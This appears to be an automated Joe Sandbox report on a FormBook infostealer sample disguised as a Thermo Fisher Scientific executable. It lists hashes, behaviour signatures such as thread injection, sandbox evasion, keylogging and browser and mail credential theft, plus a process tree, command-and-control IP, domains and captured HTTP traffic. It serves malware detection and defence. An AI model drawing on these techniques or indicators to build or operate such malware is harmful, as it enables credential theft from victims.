Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe

Overview

General Information

Sample name:Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe
renamed because original name is a hash value
Original sample name:Thermo Fisher Scientific - Ajnlatkrs.exe
Analysis ID:1559710
MD5:dd888983c289f26094548b42ac5b6c85
SHA1:a1893cba8b45a0294340419f03e05140f0b62c3b
SHA256:3eace816daaec69a4652ce191c0369a0ce5aa933a38d68996e089e8949e46c3d
Tags:exeHUNuser-smica83
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe" MD5: DD888983C289F26094548B42AC5B6C85)
    • svchost.exe (PID: 748 cmdline: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • uxnRAYhIPZRPiA.exe (PID: 3452 cmdline: "C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mobsync.exe (PID: 5612 cmdline: "C:\Windows\SysWOW64\mobsync.exe" MD5: F7114D05B442F103BD2D3E20E78A7AA5)
          • uxnRAYhIPZRPiA.exe (PID: 6576 cmdline: "C:\Program Files (x86)\VTzihlzzLzedQPFiXqrTetDAzsRToqWcPJcGXqmeLoOhjkiIhXCvjxwbRYbQ\uxnRAYhIPZRPiA.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 5240 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 3 entries
            SourceRuleDescriptionAuthorStrings
            2.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
              2.2.svchost.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", CommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", CommandLine|base64offset|contains: +!z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", ParentImage: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, ParentProcessId: 7120, ParentProcessName: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, ProcessCommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", ProcessId: 748, ProcessName: svchost.exe
                Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", CommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", CommandLine|base64offset|contains: +!z, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", ParentImage: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, ParentProcessId: 7120, ParentProcessName: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, ProcessCommandLine: "C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe", ProcessId: 748, ProcessName: svchost.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T21:09:18.080157+010028563181A Network Trojan was detected192.168.2.549793134.0.14.15880TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeReversingLabs: Detection: 42%
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000005.00000002.3902711809.0000000000640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3902432308.0000000000140000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275832203.0000000003E50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.3903604602.0000000004090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275895141.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.2275163756.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.3905763155.00000000052D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3903709621.00000000037D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeJoe Sandbox ML: detected
                Source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: Binary string: mobsync.pdbGCTL source: svchost.exe, 00000002.00000003.2244014500.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2244035599.0000000003431000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243889902.000000000341B000.00000004.00000020.00020000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903019031.0000000000608000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uxnRAYhIPZRPiA.exe, 00000004.00000000.2197419615.00000000003AE000.00000002.00000001.01000000.00000005.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3902431291.00000000003AE000.00000002.00000001.01000000.00000005.sdmp
                Source: Binary string: wntdll.pdbUGP source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2061270597.0000000003480000.00000004.00001000.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2053926155.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181650886.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179858851.0000000003700000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2277653392.0000000003F93000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.0000000004300000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.000000000449E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2283578724.000000000414B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2061270597.0000000003480000.00000004.00001000.00020000.00000000.sdmp, Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exe, 00000000.00000003.2053926155.0000000003620000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2275476735.0000000003B00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2275476735.0000000003C9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2181650886.0000000003900000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2179858851.0000000003700000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, mobsync.exe, 00000005.00000003.2277653392.0000000003F93000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.0000000004300000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3903807433.000000000449E000.00000040.00001000.00020000.00000000.sdmp, mobsync.exe, 00000005.00000003.2283578724.000000000414B000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mobsync.pdb source: svchost.exe, 00000002.00000003.2244014500.000000000341A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2244035599.0000000003431000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2243889902.000000000341B000.00000004.00000020.00020000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000004.00000002.3903019031.0000000000608000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: mobsync.exe, 00000005.00000002.3902827656.0000000002899000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.000000000492C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2570901643.0000000038D4C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: mobsync.exe, 00000005.00000002.3902827656.0000000002899000.00000004.00000020.00020000.00000000.sdmp, mobsync.exe, 00000005.00000002.3904399243.000000000492C000.00000004.10000000.00040000.00000000.sdmp, uxnRAYhIPZRPiA.exe, 00000006.00000002.3903868529.0000000002E9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2570901643.0000000038D4C000.00000004.80000000.00040000.00000000.sdmp
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00646CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00646CA9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006460DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_006460DD
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_006463F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_006463F9
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0064EB60
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064F56F FindFirstFileW,FindClose,0_2_0064F56F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_0064F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0064F5FA
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00651B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00651B2F
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00651C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00651C8A
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00651F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00651F94
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 5_2_0015C560 FindFirstFileW,FindNextFileW,FindClose,5_2_0015C560
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 4x nop then xor eax, eax5_2_00149D90
                Source: C:\Windows\SysWOW64\mobsync.exeCode function: 4x nop then mov ebx, 00000004h5_2_041904EE

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:49793 -> 134.0.14.158:80
                Source: DNS query: www.izmirescortg.xyz
                Source: DNS query: www.logidant.xyz
                Source: DNS query: www.tals.xyz
                Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                Source: Joe Sandbox ViewIP Address: 203.161.42.73 203.161.42.73
                Source: Joe Sandbox ViewASN Name: YURTEH-ASUA YURTEH-ASUA
                Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Users\user\Desktop\Thermo Fisher Scientific - Aj#U00e1nlatk#U00e9r#U00e9s.exeCode function: 0_2_00654EB5 InternetReadFile,InternetQueryDataAvailable,InternetReadFile,0_2_00654EB5
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 20:09:31 GMTserver: Apacheset-cookie: __tad=1732133371.1090000; expires=Sat, 18-Nov-2034 20:09:31 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 20:09:33 GMTserver: Apacheset-cookie: __tad=1732133373.4553886; expires=Sat, 18-Nov-2034 20:09:33 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 20 Nov 2024 20:09:36 GMTserver: Apacheset-cookie: __tad=1732133376.4844744; expires=Sat, 18-Nov-2034 20:09:36 GMT; Max-Age=315360000vary: Accept-Encodingcontent-encoding: gzipcontent-length: 576content-type: text/html; charset=UTF-8connection: closeData Raw: 1f 8b 08 00 00 00 00 00 00 03 8d 54 4d 6f db 30 0c 3d c7 bf 82 70 0f 76 d0 d5 4a 51 6c 03 12 cb 3b 0c 18 b0 61 87 a1 dd ce 83 2a d3 b1 5a 5b f2 24 26 69 50 e4 bf 97 72 dc 8f 6d c0 3a 5d 6c 51 ef 91 ef d1 94 cb 96 fa ae 4a ca 16 55 cd 0f 32 d4 61 d5 ab ba 6d 0a 42 dd 96 e2 18 49 ca a0 bd 19 08 68 3f a0 4c 09 ef 48 dc a8 ad 3a 46 53 08 5e cb 54 dc 04 d1 18 bb 46 3f 78 63 49 18 d3 60 d1 1b 5b dc 84 b4 2a c5 11 fb 5a aa 2a d9 2a 0f 1e 6b e3 51 d3 cf ce d8 5b 90 90 b5 44 c3 52 88 dd 6e 57 3c ab 13 8b 7e 87 e2 43 b6 4a 12 21 e0 0a 09 14 90 e9 d1 6d 08 5c 03 17 8b 05 f4 46 7b 17 50 3b 5b 07 20 07 78 87 7a 43 c8 c0 c7 12 60 1a a0 16 e1 85 72 18 bc eb 4d e0 98 32 5d 80 c6 79 08 ae 47 a6 a8 e0 6c d2 6c ac 26 e3 2c 1f 77 dd b5 d2 b7 97 53 aa 7c 0e f7 c9 6c 67 6c ed 76 45 e7 b4 8a a8 c2 e3 d0 29 8d f9 6f 9e 4e b3 66 90 67 ef b3 f9 2a 39 24 09 f9 7d 64 b2 ca 40 e0 6b ff 7d 32 21 21 20 4d 9b fc cf 6a 6f a2 41 e6 cf 62 c3 9a e1 db a4 59 c2 a7 67 27 5f ae 58 87 aa f3 fb de 59 43 8e 43 eb 65 94 1d f0 10 99 4f ac 64 36 2b b8 09 36 6f 06 90 15 67 2b d6 c8 76 e6 4f 71 7e 99 79 0c 9b 8e e2 f9 3d c4 fd 54 d8 47 9d d1 4e 76 7a 44 14 5b 13 62 b1 cf f5 6a 84 e9 0e d5 a3 a5 fc d9 dd fc 78 fa 7f ed 8a 65 46 42 d4 7d 00 c6 ea 36 47 ef c7 8e ff fd 1d c6 ae be 1c 39 da f3 14 c3 b5 ab b9 d1 10 b1 6b ef 36 b6 5e 9e 9c 2f ce f5 c5 3b 38 00 a3 47 10 d3 a6 cb 30 a2 af d7 da 75 ce cb f4 a4 19 57 0a 71 62 79 bb 18 17 cf 6b 59 9b 2d 8c 5c 99 d5 26 b0 fa fd 12 ac b3 b8 ca aa 52 41 eb b1 91 ff 9c df 38 09 17 59 f5 b1 33 fa 16 5a f4 38 0e aa 25 f4 a5 50 7c 71 38 3f 57 b1 6e 72 53 f6 48 9c 96 13 9e e1 af 8d d9 ca 94 2b 70 e7 db 14 78 80 88 89 32 5d ac e0 c7 e5 57 f9 5a d5 b7 f1 5e 3e 25 66 e7 d1 f2 d8 81 f8 57 78 00 84 56 5c 6f 1c 04 00 00 Data Ascii: TMo0=pvJQl;a*Z[$&iPrm:]lQJU2amBIh?LH:FS^TF?xcI`[*Z**kQ[DRnW<~CJ!m\F{P;[ xzC`rM2]yGll&,wS|lglvE)oNfg*9$}d@k}2!! MjoAbYg'_XYCCeOd6+6og+vOq~y=TGNvzD[bjxeFB}6G9k6^/;8G0uWqbykY-\&RA8Y3Z8%P|q8?WnrSH+px2]WZ^>%fWxV\o
